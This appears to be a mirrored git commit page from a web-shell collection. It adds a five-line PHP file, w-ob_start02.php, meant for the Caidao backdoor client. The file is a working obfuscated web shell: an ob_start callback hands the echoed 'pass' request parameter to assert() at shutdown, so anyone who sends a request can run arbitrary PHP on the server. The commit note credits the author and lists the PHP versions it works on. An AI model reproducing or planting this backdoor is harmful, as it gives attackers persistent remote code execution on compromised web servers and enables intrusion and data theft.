mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
add w-ob_start02.php
author : isno from : wooyun.org success running PHP5.3.3 >=
This commit is contained in:
5
caidao-shell/w-ob_start02.php
Normal file
5
caidao-shell/w-ob_start02.php
Normal file
@@ -0,0 +1,5 @@
|
||||
<?php
|
||||
ob_start(function ($c,$d){register_shutdown_function('assert',$c);});
|
||||
echo $_REQUEST['pass'];
|
||||
ob_end_flush();
|
||||
?>
|
||||
Reference in New Issue
Block a user